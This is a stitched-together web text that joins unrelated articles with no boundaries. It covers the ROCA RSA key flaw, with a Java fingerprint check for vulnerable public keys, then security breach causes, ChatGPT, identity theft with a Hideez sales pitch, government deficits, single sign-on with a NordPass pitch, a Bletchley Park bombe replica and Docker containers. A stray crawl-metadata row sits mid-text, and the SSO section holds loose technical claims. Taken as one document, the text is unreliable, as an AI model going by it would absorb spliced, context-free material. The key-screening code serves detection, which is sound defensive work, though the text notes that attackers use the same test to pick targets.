That depends on a range of factors. One has to look at the individual use case to have clarity about the effects. What makes this vulnerability so severe, though, is the fact that an attacker only needs the public key and does not require access to the hardware. Once an attacker has access to the public key, the expense and effort required to get the private key depends on the actual key size. However, to spare time and cost, attackers can first test a public key to see if it is vulnerable to the attack. This test is inexpensive and requires less than 1 millisecond. This allows attackers to focus their effort only on keys which are actually factorable.
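The cheap screening test described above works because moduli produced by the flawed library have unusual structure modulo small primes. The sketch below is a simplified version of that published fingerprint check (often called the "ROCA" test): it uses only a subset of the test primes, and the class and method names are our own. It illustrates why screening a public key costs almost nothing compared to factoring it:

```java
import java.math.BigInteger;
import java.util.HashSet;
import java.util.Set;

public class RocaScreen {
    // A subset of the small primes used by the published detection test.
    private static final int[] TEST_PRIMES = {
        11, 13, 17, 19, 37, 53, 61, 71, 73, 79, 97, 103, 107, 109, 127, 151, 157
    };

    // True if n mod p lies in the multiplicative subgroup generated by 65537 mod p.
    private static boolean inSubgroup(BigInteger n, int p) {
        Set<Integer> subgroup = new HashSet<>();
        int g = 65537 % p;
        int x = 1;
        do {
            subgroup.add(x);
            x = (x * g) % p;
        } while (x != 1);
        return subgroup.contains(n.mod(BigInteger.valueOf(p)).intValue());
    }

    // Moduli from the flawed generator pass the membership test for every
    // small prime; a single miss proves the key did NOT come from it.
    public static boolean matchesFingerprint(BigInteger modulus) {
        for (int p : TEST_PRIMES) {
            if (!inSubgroup(modulus, p)) {
                return false;
            }
        }
        return true;
    }
}
```

Because each check is just a handful of modular operations, screening millions of public keys is trivial, which is exactly why attackers can afford to filter for the factorable keys first and spend their real computing budget only on those.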
As dire and alarming as these findings are, they could reveal a benefit in the form of a wake-up call that is long overdue. While the findings are breaking news, the vulnerability has been around for years. In a world where digital transcends all borders, we are all impacted by these vulnerabilities.
For many individuals and organizations alike, cryptography is the most significant source of security that they have never heard of before now. As our lives, both personal and professional, have become intrinsically intertwined with digital and online activity, cryptography has become a critical, though invisible and often unconsidered, part of securing our daily lives and activity.
Though the imperative is clear, for many, the next steps may seem daunting. They shouldn’t. Though cryptographic algorithms are deeply embedded and widely deployed across systems, there are ways to identify them. Mitigating significant damage begins with finding out who and what systems are at risk. Once the vulnerable systems are identified, it is then possible to replace them with secure ones.
Make no mistake though: The time to identify those at risk is now. There is a reason why the researchers informed Infineon and others months ago. Addressing these challenges takes time and until they are, many systems are vulnerable.
The discovery of this massive fault line in digital security must inspire us to change how we design security systems and to move quickly towards cryptographic agility. Systems must be able to easily adapt to changes in the cryptographic core. Once they can, and once we are aware of which algorithms are used and where, such issues could be fixable with just the push of a button.
Security breaches are growing sophisticated and rampant, adversely impacting organizations across the globe. It is important for organizations to identify all the underlying incidents that lead to these security breaches. This is to not only understand the reason behind their occurrence, but also to harness valuable insights to tactfully and efficiently counter the growing number of threats.
It has been seen that the leading causes of security breaches include data breaches due to hacking and breaches done by default or weak passwords. Social security breaches also account for a significant fraction of cyberattacks, whereas data breaches that involve credentials stealing malware have also been growing at a rapid rate. Human errors have also contributed to a palpable extent of data breaches in organizations.
Key Reasons Behind Security Breaches
Working with cloud providers renders organizations to understand and follow the shared responsibility model. However, most organizations are unaware of the part of cloud providers in shared responsibility and the part they need to act on themselves. A common reason behind security breaches is the assumption of organizations that default configurations work appropriately.
Compromised passwords have been a major reason for security breaches in recent years; they are stolen through credential harvesting. Access to user credentials is an easy way to get into systems, which cyberattackers routinely exploit as the path of least resistance. For example, at Justus Liebig University (JLU) in Germany, more than 38,000 students were notified that they would receive new passwords because of a malware breach.
Human errors are responsible for more than one quarter of the security breaches. Some examples include employees leaving their devices in locations vulnerable to attacks and inadvertently emailing critical information to third parties that are unauthorized. A key instance of basic human error that results in adverse security breaches is misconfiguration of a database or application. This has a great potential of mistakenly exposing sensitive information.
Security involves three areas: people, technology, and processes. Errors occur in fundamental security processes; for example, improper patch management results in security breaches. Like weak passwords, unpatched systems have been a prime target for cyberattackers, as the effort involved in breaching them is very low. And technology is not perfect: there are many areas where failures may occur periodically, resulting in a compromised system.
How Organizations Can Safeguard Against Security Breaches
Basic security hygiene processes, managed and implemented correctly will mitigate several breaches caused by hacking. Organizations must look to ensure that security regression testing is an indispensable part of their deployment processes to prevent technology failures which result in security breaches. They must also look to encrypt data on mobile devices to prevent security breaches involving stolen or lost devices.
While several organizations assume passwords are vital for secure and valid authentication, these are actually the achilles heel of authentication practices. For mitigating real threats of security breaches arising from weak or default passwords, organizations must consider reinforcing their authentication practices with adaptive multi-factor authentication solutions that provide robust security with contextual awareness.
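One widely used building block for multi-factor authentication is the time-based one-time password (TOTP) defined in RFC 6238: the server and the user's authenticator app share a secret and independently derive a short-lived code. A minimal sketch of the 6-digit HMAC-SHA1 variant (class and method names are ours):

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.ByteBuffer;

public class Totp {
    // Computes an RFC 6238 time-based one-time password
    // (HMAC-SHA1 variant, 30-second time step, 6 digits).
    public static int code(byte[] secret, long unixSeconds) throws Exception {
        long counter = unixSeconds / 30;                       // time step index
        byte[] msg = ByteBuffer.allocate(8).putLong(counter).array();
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(secret, "HmacSHA1"));
        byte[] hash = mac.doFinal(msg);
        int offset = hash[hash.length - 1] & 0x0f;             // dynamic truncation (RFC 4226)
        int binary = ((hash[offset] & 0x7f) << 24)
                   | ((hash[offset + 1] & 0xff) << 16)
                   | ((hash[offset + 2] & 0xff) << 8)
                   | (hash[offset + 3] & 0xff);
        return binary % 1_000_000;                             // keep the last six digits
    }
}
```

Because both sides compute the same code for the same 30-second window, a stolen or guessed password alone is no longer enough to log in; the attacker would also need the shared secret.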
ChatGPT and its Impact on the IT Industry
One of our team members had a wild idea long ago: that one day there would be technology to generate software applications from software requirement documents. We were astounded when ChatGPT came alive, with its ability to generate code for a prescribed programming task such as "In Java, how to split a list into multiple lists of chunk size 10".
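For that chunking prompt, the kind of answer ChatGPT produces looks roughly like the sketch below (a representative example, not its verbatim output; the class and method names are our own):

```java
import java.util.ArrayList;
import java.util.List;

public class ListChunker {
    // Splits `source` into consecutive sublists of at most `chunkSize` elements.
    public static <T> List<List<T>> chunk(List<T> source, int chunkSize) {
        if (chunkSize <= 0) {
            throw new IllegalArgumentException("chunkSize must be positive");
        }
        List<List<T>> chunks = new ArrayList<>();
        for (int i = 0; i < source.size(); i += chunkSize) {
            // Copy the view returned by subList so each chunk is independent
            // of later changes to the source list.
            chunks.add(new ArrayList<>(
                    source.subList(i, Math.min(i + chunkSize, source.size()))));
        }
        return chunks;
    }
}
```

A 25-element list split with a chunk size of 10 yields three sublists of sizes 10, 10, and 5.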
What is ChatGPT?
ChatGPT is a conversational AI chatbot tool designed to understand user intent and provide accurate responses to a wide range of queries. It utilizes large language models (LLMs) trained on massive datasets using unsupervised learning, supervised learning, and reinforcement techniques. These models are used to predict the next word in a sequence of text, enabling ChatGPT to provide insightful and accurate responses to user queries.
What is the impact of chatgpt on IT industry?
ChatGPT has the potential to be a game changer for software professionals, improving their productivity and speeding up the software development process. Programmers can now ask ChatGPT to write code for a given problem, check the code for improvements, ask conceptual questions on any technical topic or technology, and seek best practices to follow for any specific technology or problem.
Furthermore, ChatGPT is much more than a search engine for technical information. It can understand the nuances of information (what, why, how, when) and provide insightful responses to queries that are difficult to answer with traditional search engines. As such, it is becoming a go-to choice for developers who seek to quickly and efficiently find technical information.
While some may fear that ChatGPT will reduce jobs, it should be viewed as a tool to match the ever-increasing customer demand for producing high-quality software in less time and on a smaller budget. It will help companies and individuals to conceptualize any idea and build it faster.
In terms of software development, ChatGPT is already being integrated into modern applications with built-in AI capabilities. This is likely to challenge and disrupt traditional software applications, with ChatGPT becoming ubiquitous in almost all applications used on a daily basis, including office suites, productivity tools, development IDEs, and analytics applications.
In the near future, we could see built-in ChatGPT tools for development IDEs that will assist software developers in suggesting, fixing, and reviewing code. Imagine the tools maturing to help us walk through code, explain the flow, and query the code base in natural language instead of text search.
The possibilities are endless, and the impact of chatgpt on IT is likely to be significant.
Although ChatGPT is proficient in generating code for specific, simpler problems, it may not be as effective in generating code for more intricate problems. To tackle more complicated problems, we might need to divide them into smaller subproblems and utilize the tool to generate code blocks that we can combine to solve larger issues.
It is worth noting that not all answers and generated code produced by ChatGPT are necessarily accurate. Therefore, it is essential to exercise your own intuition and judgment to validate the answers provided by the tool.
ChatGPT has the potential to revolutionize the IT industry by improving productivity and enabling faster software development. As the technology matures, we can expect to see ChatGPT integrated into more and more software applications, making it an indispensable tool for software professionals.
What's Identity Theft?
Identity theft is any crime in which the attacker gets a hold of another person’s data and uses the victim’s identity to commit fraud. For example, a common type of identity theft is when someone uses another person’s credit card to make unauthorized transactions.
That said, while identity thefts most often result in the victim losing money, they can also damage the victim's reputation and even wellbeing. Besides financial identity theft, other types of this criminal activity include medical identity theft, social security identity theft, tax identity theft, and even synthetic identity theft.
The Most Common Forms of Identity Theft
The phrase “identity theft” is a broad term that encompasses all sorts of privacy breaches in which an attacker steals the victim’s personal or financial information. But, there are many different methods that fall under this umbrella. So, it’s crucial to know the most common ones. Here are the most frequent ways attackers can obtain your personal data:
- Data Breaches - This is the most common cause of identity theft. The number of data breaches rose dramatically in 2021, and 2022 is likely to follow the same pattern. Personal details like Social Security numbers and credit/debit card information are among the most commonly stolen data in this form of identity theft.
- Compromised Browsing - If you share your personal information on a malicious website, you’re likely directly giving hackers your personal information. So, stick to well-known sites and use a secure browser.
- Malware and Phishing - By injecting your device with malware, hackers can steal your data or spy on your activities without you even realizing it. In line with that, attackers might use phishing emails or text messages to get you to unknowingly give them your valuable personal data.
- Credit Card Theft - A simple and very dangerous form of identity theft. The most common ways credit card theft can occur are through a direct data breach, physical theft, or the attacker using a credit card skimmer.
- Mail Theft - When it comes to this, we’re talking about physical mail theft, a problem that has existed long before the Internet. Any mail you send or receive using the postal system can be intercepted and used by a malicious person to commit identity theft.
Identity Theft Consequences
The consequences of identity theft can be numerous and far-reaching, because identity theft doesn’t affect you only in the moment. Most victims spend months cleaning up the situation and setting things back in order. The damage can manifest in several ways:
Consequences on Your Emotional Well-Being
The shock of discovering you’ve become a victim of identity theft is enough to rattle anyone. But the anger, insecurity, and anxiety that follow can have even bigger consequences for your emotional well-being. More worryingly, some victims even develop depression or suicidal thoughts as a result.
Consequences on Your Financial Status
Most identity thefts are committed in the interest of gaining some financial benefit from the victim. From the victim’s perspective, this adds to the overall emotional stress, as you’re also experiencing financial consequences.
If the attackers get a hold of your financial information, they can drain your accounts, leaving you penniless. Moreover, the financial ramifications could show through damaged credit, tax problems, and many more issues.
Consequences on Your Physical Health
The stress from losing money or even just having to deal with an identity theft attack can also affect your physical health. Many victims of identity theft attacks report issues like sleeplessness, heart and stomach problems, and other difficulties that come as a result of a weakened immune system.
Consequences on Your Kids
Lastly, even your children aren’t safe from identity theft attacks. Minors are often the target of identity theft, and the consequences can range from having trouble obtaining financial aid to being unable to apply to their desired universities.
Dealing With Identity Theft
The best way to check for signs of identity theft is to regularly review your credit reports and credit score. Beyond that, unauthorized transactions, bills for items you didn’t purchase, or a credit denial despite a strong credit score can all be telltale signs that you’ve fallen victim to identity theft.
If you determine that you’ve been the target of identity theft, the first thing to do is report it. Luckily, for people in the US, this process is fairly straightforward and uncomplicated. With that in mind, here’s how to report identity theft:
- Contact the company/organization where the fraud occurred
- Place a fraud alert by contacting a credit bureau
- Report the identity theft to the FTC
- File a police report with your local police department
Once you’ve completed all four steps, it’s time to mitigate and repair the damage the identity theft caused. The first thing to do is close any new accounts the attacker might’ve opened in your name. Then, you should try to get all fraudulent charges removed. After that, correct your credit report and keep a close eye on future reports to see if any new frauds pop up.
How Identity Theft Can Be Prevented
By this point, it’s clear why identity theft is so damaging, and the previous section covered what to do if you experience it. But the best way to avoid the issues identity theft causes is to prevent it from happening altogether. With that in mind, here are the best ways to prevent identity theft:
1. Freeze Your Credit
A very practical way to prevent identity fraud is to freeze your credit. Not many people know that they can freeze and unfreeze their credit whenever they want, entirely for free. Freezing your credit won’t impact your credit score or any current accounts, but it can be great protection against scammers who try to open an account under your name.
2. Stay On Alert For Malware and Phishing
Malware and phishing attacks are still among the leading causes of identity theft. Most often, these attacks are crude, but sometimes they can be hard to distinguish from legitimate communication.
For instance, scammers might spoof phone calls to appear as though they’re calling on behalf of a government agency or trusted organization. In such cases, it’s best to be extra cautious and never click on links or attachments right away. Instead, try to initiate communication through a trusted source, like a phone contact you’ve used before or the official website you’re familiar with.
3. Protect Your Social Security Number
For US citizens, the Social Security number is the master key to a wealth of valuable information. You should always shred any documents that contain it and never carry your card with you. Be careful when giving it out, and offer alternative forms of ID wherever you can.
4. Use Strong Passwords and Have Additional Authentication
Ultimately, one of the best ways to prevent identity theft is to use strong and unique passwords for every account. Don’t use any obvious passwords that people could guess by getting to know you or by inspecting your social media profiles. Moreover, consider adding an authenticator app into the mix, as it can provide you with an additional layer of protection. This leads us to the final part of this article.
What is the Best Tool for Preventing Online Identity Theft?
Hideez Key 4 is the best all-in-one device you can get to obtain ultimate digital security. This is because it serves several crucial purposes. Available in standalone and enterprise editions, the Hideez Key 4 can:
- Act as a password manager with autofill and an OTP generator, delivering uncompromising passwordless security and proximity login/logout capabilities.
- Protect against cyberattacks like phishing, spoofing, keylogging, and MITM attacks.
- Provide compliance with the latest security standards, helping to prevent identity theft.
If you want to protect your valuable information from identity theft, order your Hideez Key 4 without delay! If you’re a personal user, you can get a 10% discount using the promo code TRYHIDEEZ. For businesses, we’ve also prepared a free pilot and personalized demo of the Hideez Authentication Service, which you can get by clicking the buttons below. | <urn:uuid:9cd7c2f3-afa5-497b-bada-e648d3250131> | CC-MAIN-2024-38 | https://hideez.com/en-ca/blogs/news/identity-theft | 2024-09-14T18:44:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00392.warc.gz | en | 0.924913 | 1,767 | 3.03125 | 3 |
Governments, just like households or companies, need to plan annual budgets, based on their revenue and expense projections.
A government budget results in a deficit or a surplus: the difference between government receipts and government spending in a single year.
Just like households, if a government spends more money than it brings in, it has a deficit (indicated by a negative number). If it spends less than it brings in, it’s a budget surplus (indicated by a positive figure).
Unlike households, there is no universal best practice pertaining to government budget management; worse, best practice recommendations vary.
A deficit occurs when a government's expenses exceed the revenues it collects; conversely, a surplus occurs when revenues exceed spending.
The balance is usually presented as a percentage of gross domestic product (GDP).
Government deficits or surpluses are measured using the net borrowing (or net lending) figures of the general government sector in the national accounts. Put another way, it is the difference between total revenue and total expenditure, including capital expenditure (in particular, gross fixed capital formation).
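As a quick illustration of the arithmetic, here is a minimal sketch; the figures are entirely hypothetical:

```python
def budget_balance(revenue: float, expenditure: float) -> float:
    """Net lending (+, a surplus) or net borrowing (-, a deficit):
    total revenue minus total expenditure."""
    return revenue - expenditure

def balance_as_pct_of_gdp(revenue: float, expenditure: float, gdp: float) -> float:
    """Express the balance as a percentage of GDP."""
    return 100.0 * budget_balance(revenue, expenditure) / gdp

# Hypothetical economy: 800bn revenue, 860bn spending, 2,000bn GDP
balance = budget_balance(800, 860)            # -60bn, i.e. a deficit
pct = balance_as_pct_of_gdp(800, 860, 2000)   # -3.0 percent of GDP
```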
Revenue is mainly in the form of taxes, social contributions, dividends and other property income.
Expenditures are chiefly compensation of government employees, social benefits, interest on the public debt, subsidies and gross fixed capital formation.
A government that has a recurring yearly deficit increases its debt.
Governments have three main ways to finance a deficit: printing money, selling off assets, or borrowing.
Throughout history there have always been different opinions and fierce debates about best practice for budget deficits. The “pro” and “con” schools of deficit spending have alternately prevailed.
Many economists, the most influential of them being John Maynard Keynes, believe that governments should run deficits during recessions and periods of high unemployment to compensate for low private demand, while governments should work to balance the budget only during times of full employment and strong growth. The underlying assumption is that more government debt during a recession can stimulate the economy, whereas during times of prosperity, deficits can lead to high inflation rates. They state that the 2008-2010 stimulus packages around the world have softened the threat of a potential new “Great Depression” into a “Great Recession.”
In contrast, some economists argue that the most important issue is to reduce the deficit by cutting government spending and/or increasing taxes. While world leaders broadly embraced Keynesian economic theories at the start of the subprime crisis in the late 2000s, with huge stimulus packages in many countries, political decision makers then shifted their focus to growing debt levels and called for sharp cuts in public expenditure, as market turmoil was sparked by the government deficits of countries in the euro area, particularly Greece in 2010.
Nowadays, single sign-on (SSO) authentication is more in demand than ever. Many websites offer users the option to sign up with Google, Apple, or another service. Chances are you have logged in to something via single sign-on today, or at least this week. But do you know what it is, how it works, and why it's used? Take a deep dive into the world of single sign-on and all things related to it.
What is SSO?
Single sign-on is a session and user authentication service that allows the user to use a single set of login credentials – namely, a username and password – to access multiple websites or applications. Put plainly, SSO allows users to sign up and access a variety of online accounts with a single username and password, thus making things a lot easier for the everyday user. SSO's primary use is as an identification system that permits websites and apps to use the data of other trusted sites to verify a user upon login or sign-up.
Essentially, SSO puts an end to the days of remembering and entering multiple passwords. An added bonus is that SSO gets users out of the vicious password reset loops.
Additionally, SSO can be great for business, as it improves productivity, security control, and management. With a single security token (a username and password), IT professionals can enable or disable a user’s access to multiple systems, which in some cases mitigates cybersecurity risks.
So, how does the magical service work?
How does SSO work?
Single sign-on is a component of a centralized electronic identity known as federated identity management (FIM). FIM, or Identity Federation, is a system that enables users to use the same verification method to access multiple applications and other resources on the web. FIM is responsible for a few essential processes, including authentication, authorization, and the exchange of user attributes.
When we talk about SSO, it is important to understand that it is primarily related to the authentication part of the FIM system. It's concerned with establishing the user's identity and then sharing that information with each platform that requires that data.
Fancy jargon aside, here are the basic operational processes of single sign-on:
1. You enter a website.
2. You click “Sign In with Apple” (or another identity provider).
3. The site redirects you to Apple's account login page.
4. You log in to your Apple account (if you're already logged in, this step is skipped).
5. Apple verifies your identity and confirms to the site that you're authorized to access it.
6. If you're authorized, the site creates a session for you and logs you in.
In technical terms, when the user first signs in via an SSO service, the service creates an authentication cookie that remembers that the user is verified. An authentication cookie is a piece of code stored in the user's browser or the SSO service's servers. Next time the user logs in to that same app or website using SSO, the service then transfers the user's authentication cookie to that platform, and the user is allowed to access it. It's important to highlight that an SSO service doesn't identify the exact user since it does not store user identities.
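The flow above can be sketched in a few lines. This is a deliberately simplified illustration, not a real SSO protocol: the class and method names are invented, and a production service would verify real credentials, expire sessions, and protect the cookie in transit.

```python
import secrets

class SSOService:
    """Toy identity provider: authenticates once, then vouches for the user."""
    def __init__(self):
        self._sessions = {}  # authentication cookie -> username

    def log_in(self, username: str) -> str:
        # A real service would check a password or a stronger factor here.
        cookie = secrets.token_hex(16)
        self._sessions[cookie] = username
        return cookie

    def verify(self, cookie: str):
        return self._sessions.get(cookie)  # None if the cookie is unknown

class App:
    """Toy relying application that trusts the SSO service."""
    def __init__(self, name: str, sso: SSOService):
        self.name, self.sso = name, sso

    def access(self, cookie: str) -> str:
        user = self.sso.verify(cookie)
        if user is None:
            return "redirect to SSO login"
        return f"welcome {user}"

sso = SSOService()
mail, docs = App("mail", sso), App("docs", sso)
cookie = sso.log_in("alice")   # one login...
r1 = mail.access(cookie)       # ...grants access to both apps
r2 = docs.access(cookie)
```

The key point the sketch shows is that neither app stores credentials; both simply ask the SSO service whether the presented cookie belongs to a verified session.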
What is an SSO Token?
An SSO token is a digital unit that contains data about a particular user such as their email address. The token is used to transfer user information from one system to another during the single sign-on process. For the recipient to verify that the token comes from a trusted source, it has to be signed digitally.
The SSO service creates a token whenever a user signs in to it. The token works like a temporary ID card which helps identify an already verified user. This means that when the user tries to access a given app, the SSO service will need to pass the user’s authentication token to that app so they can be allowed in.
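A signed token of this kind can be sketched using only the standard library. The shared secret, claim names, and token layout below are simplified assumptions for illustration; real systems typically use a standard format such as JWT, often signed with asymmetric keys rather than a shared secret:

```python
import base64, hashlib, hmac, json

SECRET = b"shared-signing-key"  # assumption: a symmetric key known to both parties

def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def issue_token(claims: dict) -> str:
    """Encode the claims and append an HMAC-SHA256 signature."""
    payload = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = _b64(hmac.new(SECRET, payload.encode(), hashlib.sha256).digest())
    return f"{payload}.{sig}"

def verify_token(token: str):
    """Return the claims if the signature checks out, else None."""
    payload, sig = token.rsplit(".", 1)
    expected = _b64(hmac.new(SECRET, payload.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None  # tampered with or forged
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))

token = issue_token({"email": "user@example.com"})
```

Because the recipient recomputes the signature, any change to the payload invalidates the token, which is what lets one system trust user data handed over by another.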
How much does SSO cost?
Because many of the SSO solutions currently available on the market are cloud-based, most of them are offered on a monthly subscription model. The price of a cloud-based SSO solution designed for small and mid-sized businesses can range from $1 to $10 per user per month.
However, those that want an SSO solution designed for a big enterprise will need to either pay more each month or pay an upfront fee. Enterprise-grade solutions are usually more wide-ranging and require vendors to customize them to each client's needs and requirements. Hence the price difference.
Is single sign-on secure?
Yes. An SSO protocol is secure when implemented and managed properly and used alongside other cybersecurity tools.
The main cybersecurity benefit of single sign-on is that, because it allows a single set of credentials to be used for multiple services, there are fewer login details to be lost or stolen. As long as the server is secure and the organization's access control policies are well established, a malicious user or attacker will have little to no chance of doing any damage.
However, this benefit could also pose a certain kind of risk. Since SSO provides instant access to multiple accounts via a single endpoint, if a hacker gains access to an authenticated SSO account, they will also gain access to all the linked applications, websites, platforms, and other online environments.
This issue can be easily mitigated by implementing an additional layer of security known as Multi-Factor Authentication. Combining SSO with MFA allows service providers to verify users' identity while giving them easy access to applications or online platforms.
The benefits of SSO
Reduced password fatigue
With SSO in place, users only have to remember one password, making life a lot easier. Password fatigue is real and dangerous. SSO encourages users to come up with a single strong password rather than using a simple one for each account separately. It also helps users escape the vicious cycle of password reset loops.
Increased employee and IT productivity
When deployed in a business setting, SSO can be a real time saver. According to a recent report, people waste 16.3 billion hours a year trying to remember, type, or reset passwords. In a business environment, every minute counts. Thanks to SSO, users don't need to hop between multiple login URLs or reset passwords and can focus on the tasks at hand.
Enhanced user experience
One of the most valuable benefits of SSO is an improved user experience. Because repeated logins are not required, users can enjoy a digital experience with less hassle. This means that users will be less hesitant to use the service. For any commercial web-based service, SSO is an essential part of their user experience.
Centralized control of user access
SSO offers organizations centralized control over who has access to their systems. In a business setting, you can use SSO to grant new employees specific levels of access to different systems. You can also provide employees with a single set of credentials (username and passwords) to access all company systems.
Top single sign-on solutions
Microsoft Azure AD
Microsoft Azure AD includes Active Directory Federation Services (AD FS) as an option to support SSO. Azure AD also offers reporting, security analytics, and multi-factor authentication services. It's perfectly suited for any company that uses the Microsoft Azure cloud platform, no matter its size.
Okta Identity Cloud
Okta is well-established in the world of SSO solutions and a leader in the space thanks to its flexibility and ease of use. Okta offers customizable identity management in real time according to business needs, as well as two-factor authentication and a password reset functionality. Okta can serve the needs of multiple industries, from education and nonprofits to financial services and government.
OneLogin Unified Access Management Platform
OneLogin is a cloud-based SSO provider that is often used for employee access to a company's cloud applications. OneLogin suits a variety of IT administrator needs since it is designed to enforce IT policy in real time. It can also be updated quickly when changes occur, such as an employee leaving.
Idaptive Application Services
Idaptive is primarily suited for small to medium-sized businesses. Idaptive is capable of providing support to many users at once, thanks to their new cloud architecture. The company also offers adaptive MFA, enterprise mobility management (EMM), and user behavior analytics (UBA) all in a single solution.
Ping Intelligent Identity Platform
Ping offers services to large enterprises. The solution can serve anywhere between a few hundred to a few million users. Ping provides both on-premises and cloud options for deploying their solution. Additionally, the service comes with multi-factor authentication.
Does NordPass provide SSO?
Yes, NordPass does provide a single sign-on authentication! It can be set up via NordPass Admin Panel for users who want to log in to the NordPass app with their Microsoft Azure, Google Workspace, or Okta credentials.
This means that if you turn on Microsoft Azure Active Directory (AD), Google Single Sign-On, or Okta Single Sign-On and invite new members who use one of these providers, they will be able to log in using their Azure AD, Google, or Okta SSO credentials. It's as simple as that.
British Museum Unveils WWII Computer Replica
The brainchild of Alan Turing--often called the father of modern computer science--and Gordon Welchman, "bombes" such as the one the replica represents were used to decrypt more than 3,000 messages a day from the Nazis' Enigma machine.
A replica of an early computer built to sift through encrypted German messages during World War II has been completed, a British museum announced Friday.
Bletchley Park, where British code-breakers took on the Germans' Enigma machine, unveiled the replica Turing Bombe, and said the electromagnetic computer would enter its commissioning phase later this month.
The brainchild of Alan Turing -- often called the father of modern computer science -- and Gordon Welchman, "bombes" such as the one the replica represents were used to decrypt more than 3,000 Enigma messages daily. They were instrumental throughout World War II in giving the Allies a major intelligence advantage over the Nazis. Breaking German naval messages, for instance, let American and British planners steer Atlantic convoys away from U-boat positions.
The replica sports 108 electromagnetic spinning drums used to test letter combinations that then let analysts match the daily Enigma rotor settings. More than 60 volunteers using original blueprints labored for over 10 years to recreate the computer.
The machine will go on public display September 23 at the National Codes Centre at Bletchley Park, which is near Milton Keynes, about 45 miles northwest of London.
In March, a group of computer enthusiasts combined the power of their desktop PCs to crack several 63-year-old Enigma messages that had been intercepted but never decrypted.
What Is Container Technology?
Containers provide a lightweight package that lets you deploy applications anywhere, making them more portable. Container images package services and applications together with their configurations and dependencies. This makes development and testing easier, because applications can be automatically deployed to a realistic staging environment. It also eases scalability in production environments.
Another important element of containers is that they are immutable, meaning that at least in principle, they should not be changed after being deployed. To modify a container, you tear it down and deploy a new one.
The unique properties of containers makes them much more reliable than traditional infrastructure: deployments become repeatable, and you can easily roll back by deploying an older version of a container image. Immutability also makes it possible to deploy the same container image in development, testing, and production environments, supporting agile development principles.
This is part of our series of articles about Docker containers.
What Are the Benefits of Containers?
Containers provide a highly effective way to deploy applications and services at scale on any hardware. Applications or services running as containers use a small fraction of the resources on the host (enabling a large number of containers to run on one host). They are well isolated, so they don’t interfere with each other or directly affect the host’s operations.
Here are the main benefits of containers compared to other ways of running software on host infrastructure:
- Lightweight—because containers share the system’s operating system kernel, there is no need to run a complete operating system instance for each application, reducing the size of container files and resources needed. Containers can start quickly, are torn down easily, and are easy to scale horizontally, meaning they can better support cloud-native applications.
- Portability and platform independence—containers have all their dependencies inside. This means that the same software can be created once and run consistently on laptops, on-premise hardware, or in the cloud, with no reconfiguration required.
- Support for modern architectures—containers can be constructed from a simple configuration file and have a high level of portability and consistency. This makes them highly suitable for DevOps, microservices architectures, and serverless computing, in which software is built from small components that are iteratively developed.
- Increased utilization—containers allow developers and operators to increase CPU and memory utilization on physical machines. Containers allow granular deployment and scaling of application components, which can support microservices design patterns.
How Containers Work
In a containerized environment, the host operating system controls each container’s access to computing resources (i.e., storage, memory, CPU) to ensure that no container consumes all the host’s resources.
A container image file is a static, complete, executable version of a service or application. Different technologies use different image types. A Docker image comprises several layers, starting with a base image that contains the dependencies needed to execute the container's code. The image's layers are read-only; when a container starts, a writable layer is added on top. Because every container gets its own writable container layer, the underlying image layers can be saved, shared, and reused across containers.
A container engine executes the container images. Most organizations use container orchestration or scheduling solutions like Kubernetes to manage their container deployments. Containers are highly portable because every image contains the dependencies required to execute the code stored in the appropriate container.
The main advantage of containerization is that users can execute a container image on a cloud instance for testing and then deploy it on an on-premises production server. The application performs correctly in both environments without requiring changes to the code within a container.
What Is a Container Image?
A container image is a static immutable file with instructions that specify how a container should run and what should run inside it. An image contains executable code that enables containers to run as isolated processes on IT infrastructure. It consists of platform settings, such as system libraries and tools, that enable software programs to run on a containerization platform like Docker.
Container images are compiled from file system layers built onto a base or parent image. The term base image usually refers to a new image with basic infrastructure components, to which developers can add their own custom components. Compiling a container image using layers enables you to reuse components rather than creating each image from scratch.
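Conceptually, layering works like a union of file maps, with later layers shadowing earlier ones and the container adding its own writable layer on top. The sketch below is a toy model of that idea; the layer contents and file names are made up for illustration:

```python
# Each "layer" is modeled as a map from path to file contents.
base_layer = {"/bin/sh": "busybox", "/etc/os-release": "alpine"}
deps_layer = {"/usr/lib/libssl.so": "openssl"}
app_layer  = {"/app/server": "my-service v1"}

image_layers = [base_layer, deps_layer, app_layer]  # immutable, reusable

def container_fs(layers, writable_layer):
    """Union view: later layers (and the writable layer) shadow earlier ones."""
    view = {}
    for layer in layers + [writable_layer]:
        view.update(layer)
    return view

# Two containers share the same image layers; only the writable layer differs.
c1 = container_fs(image_layers, {"/tmp/state": "container-1"})
c2 = container_fs(image_layers, {"/tmp/state": "container-2"})
```

This is why compiling images from layers saves space and build time: the base and dependency layers are stored once and reused by every container and derived image.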
What Is Docker?
Docker is an open source platform for creating, deploying, and managing virtualized application containers. It provides an ecosystem of tools that provide various capabilities to package, provision, and run containers.
Docker utilizes a client-server architecture. Here is how it works:
- The daemon deploys containers—a Docker client talks to a daemon that builds, runs and distributes Docker containers.
- Clients and daemons can share resources—a Docker daemon and client can run on the same system. Alternatively, you can connect the client to a remote daemon.
- Clients and daemons communicate via APIs—A Docker daemon and client can communicate via a REST API over a network interface or UNIX sockets.
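In other words, the client is essentially an HTTP client for the daemon's REST API. The sketch below only builds a connection object for the daemon's default Unix socket (assuming a Linux host and the default socket path); actually sending requests such as `GET /containers/json` requires a running Docker daemon:

```python
import http.client
import socket

class UnixSocketConnection(http.client.HTTPConnection):
    """HTTP connection over a Unix domain socket instead of TCP."""
    def __init__(self, socket_path="/var/run/docker.sock"):
        super().__init__("localhost")
        self.socket_path = socket_path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.socket_path)

conn = UnixSocketConnection()
# With a daemon running, you could now do, for example:
#   conn.request("GET", "/containers/json")  # list running containers
#   body = conn.getresponse().read()
```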
What Are Windows Containers?
In the past, Docker Toolbox, a variant of Docker for Windows, used to run a VirtualBox instance with a Linux operating system on top of it. It allowed Windows developers to test containers before deploying them on production Linux servers.
